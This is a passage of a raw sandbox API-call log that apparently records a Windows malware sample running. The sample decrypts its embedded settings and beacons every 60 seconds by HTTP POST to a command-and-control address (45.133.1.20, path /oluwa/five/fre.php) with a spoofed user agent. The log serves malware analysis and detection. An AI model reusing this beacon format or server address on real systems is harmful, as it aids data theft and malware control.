[0257.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0257.406] GetProcessHeap () returned 0x6a0000 [0257.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0257.407] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15d8) returned 0x8a8 [0257.409] Sleep (dwMilliseconds=0xea60) [0257.411] GetProcessHeap () returned 0x6a0000 [0257.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0257.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.413] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.421] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0257.449] GetProcessHeap () returned 0x6a0000 [0257.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0257.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.451] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0257.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.452] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.456] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.456] GetProcessHeap () returned 0x6a0000 [0257.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0257.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.458] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0257.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.460] CryptDestroyKey (hKey=0x6ad020) returned 1 [0257.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.461] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0257.461] GetProcessHeap () returned 0x6a0000 [0257.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0257.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.462] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0257.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.463] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0257.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.464] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0257.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.465] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0257.465] GetProcessHeap () returned 0x6a0000 [0257.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0257.465] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0257.465] GetProcessHeap () returned 0x6a0000 [0257.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0257.473] GetProcessHeap () returned 0x6a0000 [0257.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0257.473] GetProcessHeap () returned 0x6a0000 [0257.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0257.474] GetProcessHeap () returned 0x6a0000 [0257.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0257.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.475] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.483] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0257.492] GetProcessHeap () returned 0x6a0000 [0257.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0257.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.493] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0257.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.494] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.495] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.495] GetProcessHeap () returned 0x6a0000 [0257.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0257.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.497] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0257.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.498] CryptDestroyKey (hKey=0x6ad020) returned 1 [0257.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.499] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0257.499] GetProcessHeap () returned 0x6a0000 [0257.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0257.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.500] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0257.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.501] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0257.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.502] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0257.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.503] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0257.503] GetProcessHeap () returned 0x6a0000 [0257.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0257.503] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0257.503] GetProcessHeap () returned 0x6a0000 [0257.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0257.503] socket (af=2, type=1, protocol=6) returned 0x8ac [0257.503] connect (s=0x8ac, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0257.534] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0257.534] GetProcessHeap () returned 0x6a0000 [0257.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0257.534] GetProcessHeap () returned 0x6a0000 [0257.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0257.535] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0257.537] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0257.537] GetProcessHeap () returned 0x6a0000 [0257.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db108 [0257.537] GetProcessHeap () returned 0x6a0000 [0257.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0257.537] GetProcessHeap () returned 0x6a0000 [0257.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0257.537] GetProcessHeap () returned 0x6a0000 [0257.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0257.538] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0257.539] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0257.539] GetProcessHeap () returned 0x6a0000 [0257.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0257.539] GetProcessHeap () returned 0x6a0000 [0257.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0257.540] send (s=0x8ac, buf=0x6bd460*, len=242, flags=0) returned 242 [0257.541] send (s=0x8ac, buf=0x6bb998*, len=159, flags=0) returned 159 [0257.541] GetProcessHeap () returned 0x6a0000 [0257.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0257.541] recv (in: s=0x8ac, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0257.641] GetProcessHeap () returned 0x6a0000 [0257.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0257.642] GetProcessHeap () returned 0x6a0000 [0257.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0257.642] GetProcessHeap () returned 0x6a0000 [0257.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db108 | out: hHeap=0x6a0000) returned 1 [0257.643] GetProcessHeap () returned 0x6a0000 [0257.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0257.643] closesocket (s=0x8ac) returned 0 [0257.644] GetProcessHeap () returned 0x6a0000 [0257.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0257.644] GetProcessHeap () returned 0x6a0000 [0257.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0257.644] GetProcessHeap () returned 0x6a0000 [0257.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0257.645] GetProcessHeap () returned 0x6a0000 [0257.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0257.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15dc) returned 0x8ac [0257.650] Sleep (dwMilliseconds=0xea60) [0257.653] GetProcessHeap () returned 0x6a0000 [0257.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0257.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.655] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.691] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0257.706] GetProcessHeap () returned 0x6a0000 [0257.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0257.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.707] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0257.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.709] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.710] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.710] GetProcessHeap () returned 0x6a0000 [0257.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0257.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.742] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0257.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.744] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0257.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.745] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0257.745] GetProcessHeap () returned 0x6a0000 [0257.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0257.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.750] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0257.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.751] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0257.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.752] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0257.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.754] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0257.754] GetProcessHeap () returned 0x6a0000 [0257.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0257.754] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0257.754] GetProcessHeap () returned 0x6a0000 [0257.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0257.755] GetProcessHeap () returned 0x6a0000 [0257.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0257.755] GetProcessHeap () returned 0x6a0000 [0257.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0257.756] GetProcessHeap () returned 0x6a0000 [0257.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0257.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.760] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0257.778] GetProcessHeap () returned 0x6a0000 [0257.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0257.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.780] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0257.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.781] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.783] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.783] GetProcessHeap () returned 0x6a0000 [0257.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0257.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.787] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0257.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.791] CryptDestroyKey (hKey=0x6ad020) returned 1 [0257.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.794] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0257.794] GetProcessHeap () returned 0x6a0000 [0257.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0257.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.795] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0257.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.796] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0257.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.797] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0257.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.799] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0257.799] GetProcessHeap () returned 0x6a0000 [0257.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0257.799] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0257.799] GetProcessHeap () returned 0x6a0000 [0257.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0257.799] socket (af=2, type=1, protocol=6) returned 0x8b0 [0257.799] connect (s=0x8b0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0257.824] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0257.824] GetProcessHeap () returned 0x6a0000 [0257.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0257.824] GetProcessHeap () returned 0x6a0000 [0257.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0257.825] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0257.826] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0257.826] GetProcessHeap () returned 0x6a0000 [0257.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da988 [0257.826] GetProcessHeap () returned 0x6a0000 [0257.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0257.827] GetProcessHeap () returned 0x6a0000 [0257.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0257.827] GetProcessHeap () returned 0x6a0000 [0257.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0257.828] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0257.828] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0257.829] GetProcessHeap () returned 0x6a0000 [0257.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0257.829] GetProcessHeap () returned 0x6a0000 [0257.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0257.829] send (s=0x8b0, buf=0x6bd460*, len=242, flags=0) returned 242 [0257.830] send (s=0x8b0, buf=0x6bb998*, len=159, flags=0) returned 159 [0257.830] GetProcessHeap () returned 0x6a0000 [0257.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0257.830] recv (in: s=0x8b0, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0257.908] GetProcessHeap () returned 0x6a0000 [0257.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0257.909] GetProcessHeap () returned 0x6a0000 [0257.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0257.910] GetProcessHeap () returned 0x6a0000 [0257.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da988 | out: hHeap=0x6a0000) returned 1 [0257.910] GetProcessHeap () returned 0x6a0000 [0257.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0257.910] closesocket (s=0x8b0) returned 0 [0257.911] GetProcessHeap () returned 0x6a0000 [0257.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0257.911] GetProcessHeap () returned 0x6a0000 [0257.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0257.911] GetProcessHeap () returned 0x6a0000 [0257.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0257.912] GetProcessHeap () returned 0x6a0000 [0257.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0257.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15e0) returned 0x8b0 [0257.915] Sleep (dwMilliseconds=0xea60) [0257.916] GetProcessHeap () returned 0x6a0000 [0257.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0257.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.917] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: 